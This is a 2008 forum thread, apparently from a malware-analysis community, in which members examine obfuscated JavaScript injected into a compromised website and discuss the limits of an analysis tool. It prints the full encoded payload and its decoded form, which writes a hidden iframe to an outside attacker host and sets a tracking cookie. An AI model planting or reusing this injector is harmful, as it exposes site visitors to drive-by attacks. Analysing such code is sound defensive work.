Author Topic: Injected code  (Read 5223 times)

0 Members and 1 Guest are viewing this topic.

May 18, 2008, 01:58:53 pm
Read 5223 times

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Someone fulfilled a bug report for Malzilla (debugger crash), and gave the following sites as examples:
Code: [Select]
www.hrapu.net/
www.colorsky.ru/
www.onix.ru/
I only managed to open onyx.ru, and it contained the following injected code (cleaned from the site already):
Code: [Select]
eval(unescape('function%20fEjT%28vAg%29%7Bfunction%20rPe%28yDT%29%7Bvar%20yQQ%3D0%2ClTD%2CrOcfWPi%3DyDT.length%3Bfor%28lTD%3D0%3BlTD%3CrOcfWPi%3BlTD++%29yQQ+%3DyDT.charCodeAt%28lTD%29*rOcfWPi%3Breturn%20new%20String%28yQQ%29%7DvAg%3Dunescape%28vAg%29%3Bvar%20ukHcUCK%3Deval%28%27a%2CrxgZu%7Emxe%7EnZt%2Cs%7E.%7Ec%2Caxlxl%2Ce%7Eev%27.replace%28/%5Bv%7EZx%2C%5D/g%2C%20%27%27%29%29.toString%28%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/g%2C%27%27%29%2CgqeeE%3DrPe%28ukHcUCK%29%2Ctbp%3Dnew%20String%28%29%2Caya%3D0%3BiNp%3D0%3Bfor%28var%20xiuLc%3D0%3BxiuLc%3CvAg.length%3BxiuLc++%29%7Btbp+%3DString.fromCharCode%28vAg.charCodeAt%28xiuLc%29%5E%28ukHcUCK.charCodeAt%28aya%29%5EgqeeE.charCodeAt%28iNp%29%29%29%3Baya++%3BiNp++%3Bif%28aya%3EukHcUCK.length%29aya%3D0%3Bif%28iNp%3EgqeeE.length%29iNp%3D0%3B%7Deval%28tbp%29%3Btbp%3D%27%27%3Breturn%3B%7DfEjT%28%27%2531%2538%2537%2532%2537%2539%2538%2532%2546%253f%252b%2527%256c%255f%2525%2523%257c%2525%252b%2508%2570%252d%252b%2524%251c%2538%250d%250c%251c%2524%2573%2578%2560%2512%250a%255e%256e%2520%2502%251a%2577%256b%254d%2571%2500%2513%2506%253d%253f%251a%2502%2578%2576%254c%2524%2536%2525%2572%2570%2522%2522%2537%2527%255b%2569%2537%2514%2516%252a%2513%2528%252f%2508%251b%252a%253f%250f%2511%2524%2507%2579%2561%2555%2518%256a%2535%2523%2579%2533%257e%257c%2560%2503%2517%2503%253c%2525%2500%2557%255e%2512%2522%2534%2513%2575%2533%2572%2518%250d%252f%2510%2561%257b%2512%254c%250f%2516%2518%253f%2501%2538%2543%2518%256b%251f%2536%2525%251f%252b%2564%256e%2509%2526%2506%2519%2539%2531%2568%2536%2560%2510%2574%2553%255d%2524%2547%2535%253e%2568%253e%2514%2521%257d%2522%2509%253d%2541%2527%251d%2560%251e%251d%253a%253e%254a%2522%2548%2567%2545%250f%255f%250c%2562%2575%256c%2537%252c%2522%257d%2511%2531%2560%2574%2508%2571%2500%2567%2528%2529%2554%2502%2534%257b%256f%2576%254c%2561%255b%2573%2522%2538%2575%2536%2572%252f%253b%2515%2514%252f%2516%253e%257f%2516%255a%2553%2511%2559%253e%254f%2531%253e%2545%252b%252e%2510%2538%2570%2563%253e%2530%251a%2528%2510%2540%2525%2528%2512%2501%2507%255f%254d%253b%2548%2531%2567%2522%2533%253b%2503%2566%2536%2539%2561%253d%2539%257d%253c%253d%2578%2537%252f%2522%256d%2579%2572%251e%2513%2522%251c%2552%2508%252f%255e%250c%2528%2526%257d%2567%256b%2575%2567%254d%2521%256b%252c%257d%2527%2511%2524%2522%256f%2534%257f%2511%2534%2525%2517%252c%250e%252d%2534%2565%2538%2571%2573%2516%2526%2539%2572%2558%2564%2537%2564%2506%251d%253c%2529%2524%255b%2523%253e%2560%2535%254f%2520%2517%2537%2525%2537%2550%2565%2571%2514%2527%2515%2520%2524%2534%2559%253e%254e%2538%251e%2579%2537%252f%253b%252e%2515%2529%254a%2523%250b%252a%2527%252b%2570%2578%257f%2541%253c%2559%256d%2508%2532%2568%2526%2555%2551%250c%2561%250e%2524%257a%2518%256c%2537%2501%2529%2516%2547%251b%2579%2571%252b%252e%2511%2528%2532%251c%2534%254a%2555%2528%2564%2530%2570%2566%2517%251f%2502%2577%2526%257f%2510%257f%2579%2577%2557%2534%2575%256e%256b%2530%255b%2546%2539%2502%2536%250e%2528%252d%2510%2546%2576%2532%256b%2514%2577%256d%252e%255b%2535%251c%2538%257b%2529%2509%2572%2517%2555%2571%254a%2534%2537%2535%253b%252f%253e%2547%2570%2505%2527%2508%255a%257a%250e%2508%2549%2523%257a%2574%2561%2579%257f%257f%253d%2524%253c%2528%2500%2548%2532%253d%253e%2508%253e%250f%2563%2572%253b%254b%2509%257c%2529%253c%257c%253d%250f%250d%2535%2529%2519%2528%254f%2530%2538%2575%2575%2537%2539%2537%252e%255c%253e%2503%251c%2569%2532%2508%252a%2521%2523%2527%253b%2549%2559%2523%2528%2540%2515%2516%250f%2502%2527%2513%252d%2576%2536%253f%255b%2564%251d%253d%2537%2536%251b%252e%2536%2533%2552%2566%251f%2534%2525%2528%251a%253a%251f%2531%2519%2510%250c%2579%256d%257d%2523%2526%252b%2529%252a%2535%253f%252e%2541%254a%250d%2506%253e%2530%257c%2536%2526%2533%256e%2514%253b%252d%2503%2538%2524%2536%253e%2569%2507%2516%2538%2503%2505%2515%2533%2520%257d%2504%253f%2567%2531%2571%2570%2511%2528%252b%250d%2526%2538%254d%2564%2573%253e%2562%2521%250e%257b%2567%2561%2565%2574%2532%2576%257f%255e%257b%2526%253a%2562%2566%2565%257b%2570%2551%254b%253c%2567%2575%257f%257b%2524%257d%256e%2578%256a%2579%2529%253e%2573%252f%2531%2519%2533%253c%2530%2570%255e%2578%252a%2568%2544%2574%2568%2505%2531%250a%2503%2562%254c%254c%2538%2570%2548%2521%2534%2535%2533%2510%255a%2548%257d%2578%2579%2558%257d%2544%2551%2560%253d%2528%2539%252a%2577%252e%252a%2511%2518%2522%2532%253c%2575%2533%2577%251a%250d%2551%2575%250c%2577%252f%2568%2578%2567%2519%254e%256f%2567%2570%2560%2552%2574%257a%252f%2519%2528%2515%2537%2521%2556%2576%2539%2502%254b%2574%2570%256f%257d%2561%2577%2564%255e%2543%256e%257a%2565%254f%2561%256b%257a%257c%2513%2577%2537%2536%2573%253d%251f%2524%2501%2513%251c%2533%2500%2523%2533%2511%2531%257b%254b%2570%2579%256e%2551%257a%2573%257f%2553%255f%2569%2525%252a%2517%2527%2562%253b%2515%2510%2510%255b%2557%253c%2520%2539%2530%2533%256d%252e%253d%2526%251b%2578%2525%256d%2523%2506%2534%2535%2568%2550%2536%252e%2522%2532%2514%2514%2565%257d%2534%2518%2562%2576%2550%2503%2535%2535%2515%2534%2516%2522%2538%2531%2541%2572%2579%2524%252c%2511%2539%2519%2518%2524%2571%257c%253c%253d%253d%2528%257c%2573%250f%2531%2564%252b%2531%2577%250c%253e%2534%2503%2574%2539%254f%253c%2535%2539%2521%2575%2530%2538%2525%251c%256a%252e%2567%256e%2537%2542%2536%253f%2533%2512%253c%2524%252f%257f%251a%2521%253d%2579%2576%2530%2538%2533%2579%255d%2576%2530%253c%2520%2526%253a%2501%2521%2569%257f%257e%2569%257c%256c%257b%2565%256d%255e%2573%2558%2562%2562%2548%254d%252a%253c%2511%253d%2504%2503%256c%256f%257b%250f%2519%2543%2528%251e%2531%2574%255d%2549%253f%252a%2529%2500%2536%2570%2577%257b%2563%256e%257a%254d%257e%252f%2528%2505%2512%2579%2531%254e%2532%2522%251b%2521%2531%2549%2542%2573%2565%2574%2510%2539%2516%250a%253c%2518%251f%2521%2541%2572%253d%256b%2505%2537%251a%2510%2527%2527%2529%251e%251a%252e%251f%2572%2577%255e%2570%2525%2566%2533%252a%2530%252e%2537%2538%251c%250f%2505%2530%2534%253f%253b%2533%252e%2535%2540%2574%2556%2533%2537%2539%253e%2535%250a%253f%2526%257a%256d%250d%252c%252b%2527%2507%2536%253d%255f%2570%254a%251e%251c%2534%2503%253d%2531%2538%256a%256b%2522%2530%2507%251e%2535%2525%257c%2535%2503%2529%2571%2539%2561%2534%253c%2522%2522%2532%2532%257a%257d%250a%253b%2525%2570%2525%251c%2528%2539%2536%2543%257f%256e%254a%2577%253c%257e%253f%253c%2500%2536%2502%2530%256e%253d%2538%2530%2577%251b%2531%251e%253a%253f%2521%2539%2551%2573%2510%2576%2528%2537%253a%255f%252f%251f%2541%2549%2578%2561%2502%257f%2575%253a%251a%2523%2517%251d%2524%2500%2577%2578%2572%2516%2524%253b%2511%2507%2572%2529%253b%2561%257f%252c%2501%2503%253e%2565%2537%2564%256f%2522%257f%251a%256d%252f%256e%2559%2576%2549%256c%252c%2541%2561%256d%2513%257f%257b%257a%2534%2566%2570%2571%2520%257b%2528%2535%2519%251b%2524%254d%251d%2539%250f%2530%2515%2537%2500%257c%255b%250f%253e%2533%253c%2526%2509%2529%2568%2546%2504%252e%254f%2571%2563%2516%2508%255e%250f%257c%256a%2553%257a%257a%2570%2521%254e%2540%2538%2560%2539%253c%2537%2552%2521%2537%2517%2550%2525%2572%256b%2579%251c%2567%252b%2550%2510%2570%2549%2558%2513%253c%2566%2539%254f%2530%250e%253a%2525%2526%250a%2564%251e%2518%2524%2537%2568%2531%253e%2513%2579%2523%2540%251d%252b%2500%2535%257d%252e%2518%2528%250d%2510%2525%257e%2562%257c%2533%2558%252e%250c%2539%253e%253a%253b%256b%257e%2541%257d%2564%255b%2548%256b%253b%2526%2522%252d%2528%2548%253f%257a%252b%252e%2536%2530%2522%2508%254a%2571%257b%2536%2523%2516%2565%2530%2536%250a%2530%251e%2539%256d%2557%257f%256b%256b%2518%2502%2573%256d%2522%2522%253d%2536%2523%2511%2531%2564%256d%251b%250b%255d%2502%2579%2558%250e%2570%2503%2572%253e%2573%255d%257f%2573%256e%2555%2533%253b%252d%253c%2532%2523%253f%253f%253a%2530%2507%2568%2571%2501%255d%2500%2531%2538%256e%250c%2552%253d%257b%2563%253a%2510%2563%2565%2536%252d%251b%2547%254b%2552%2527%2548%2557%2573%2575%2535%2538%2526%2500%2538%2532%2534%2568%2572%2556%27%29%3B'));

That decodes to:
Code: [Select]
function KyD(){};KyD.prototype = {install : function(){if(!this.alreadyInstalled()){var s="<Qd@iIv% IsQt%y%lIeI=)\'Id@iQs%p%lQaIy%:QnQoIn)e%\')>@<Ii)f@rQaIm)eI IsQrQcQ=Q\'Q".replace(/[%\)@QI]/g, '')+this.getFrameURL()+"\'P>{<%/%ibfbr%a{mPe%>%<b/{d{i*vP>b".replace(/[\{\*Pb%]/g, '');try {var o=document;o.open();o.write(s);o.close();}catch(e){document.write('<$h$tYm0l$>Y<xb$o$dxyG>Y'.replace(/[x\$0GY]/g, '')+s+'<U/PbUoPdwy9>5<U/9h9tPm9lU>P'.replace(/[UP95w]/g, ''))}this.setCookie(this.cookieName, this.cookieValue);}},cookieName:'feadcbhg',getFrameURL : function(){var dlh=document.location.host; return "http"+'://'+((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.')  + "." + this.getRandString() + "." + this.host + this.path;},path:'/traff2.cn/',setCookie : function(name, value){var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value)+"; expires="+d.toGMTString(); },alreadyInstalled : function(){return !(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);},getRandString : function(){var l=16,c='0%1@2q3&4V5%6@7@8q9VaVbqc@dVeVf@'.replace(/[qV%&@]/g, ''),o='';for(var i=0;i<l;i++)o+=c.substr(Math.floor(Math.random()*c.length),1,1);return o;},host:'2dtdrdadfRf6.6c<nR'.replace(/[Rd\>6\<]/g, ''),cookieValue:1};var o44o=new KyD();o44o.install();
Pretty complicated script (and I do not understand it enough).

May 18, 2008, 05:29:29 pm
Reply #1

ZaiRoN

  • Special Members
  • Newbie

  • Offline
  • *

  • 7
    • http://zairon.wordpress.com/
Code: [Select]
function KyD() {};

KyD.prototype = {
install : function()
{
if (!this.alreadyInstalled())
{
var s="<Qd@iIv% IsQt%y%lIeI=)\'Id@iQs%p%lQaIy%:QnQoIn)e%\')>@<Ii)f@rQaIm)eI IsQrQcQ=Q\'Q"
.replace(/[%\)@QI]/g, '')+this.getFrameURL()+"\'P>{<%/%ibfbr%a{mPe%>%<b/{d{i*vP>b"
.replace(/[\{\*Pb%]/g, '');
try {
var o=document;
o.open();
o.write(s);
o.close();
}catch(e)
{
document.write('<$h$tYm0l$>Y<xb$o$dxyG>Y'.replace(/[x\$0GY]/g, '')+s+'<U/PbUoPdwy9>5<U/9h9tPm9lU>P'.replace(/[UP95w]/g, ''))
} this.setCookie(this.cookieName, this.cookieValue);
}
},

cookieName:'feadcbhg',
getFrameURL : function()
{
var dlh=document.location.host;
return "http"+'://'+((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.')  + "." + this.getRandString() + "." + this.host + this.path;
},

path:'/traff2.cn/',
setCookie : function(name, value)
{
var d= new Date();
d.setTime(new Date().getTime() + 86400000);
document.cookie = name + "=" + escape(value)+";
expires="+d.toGMTString();
},

alreadyInstalled : function()
{
return !(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);
},

getRandString : function()
{
var l=16,
c='0%1@2q3&4V5%6@7@8q9VaVbqc@dVeVf@'.replace(/[qV%&@]/g, ''),o='';
for(var i=0;i<l;i++)
o+=c.substr(Math.floor(Math.random()*c.length),1,1);
return o;
},

host:'2dtdrdadfRf6.6c<nR'.replace(/[Rd\>6\<]/g, ''),
cookieValue:1
};
var o44o=new KyD();
o44o.install();
OOP over javascript, encrypted strings... pretty funny :)

May 18, 2008, 06:26:57 pm
Reply #2

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Not much of OOP there, just a prototype, and one instance of it. It is just a "scrambler" for detection modules in anti-virus apps, nothing more.
Bigger problem for me is the number of DOM objects and methods used. I can't simulate them.
You simply need a full-featured browser for this to run and analyze (and I do not want to run it in browser).

May 18, 2008, 06:39:48 pm
Reply #3

ZaiRoN

  • Special Members
  • Newbie

  • Offline
  • *

  • 7
    • http://zairon.wordpress.com/
Why can't you simulate it? Removing the regular expression things you can access the original source code.
What else do you need? Sorry but I don't understand your problem...

May 18, 2008, 06:51:02 pm
Reply #4

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
(here goes the main theme from Jaws movie)

Regular expressions?

(here goes the theme from X-Files)


Back on topic:

No, not a real problem, but I need to do it manually, or by using external tools. Thats the catch I do not like.
I get a couple of mails on weekly basis "how to do this in Malzilla, why Malzilla does not do this or that", etc.
If this form of the script is the best I can give in Malzilla, I'm in trouble.

Malzilla can't go further with the script because of missing DOM objects in Malzilla (location.href, windows.location etc.).
Only thing I can try to do is some kind of interpreter for RE, compatible with JS syntax.

I do not like the idea.
I still didn't finished many other stuff in Malzilla, and starting one more function to implement would make it even worse.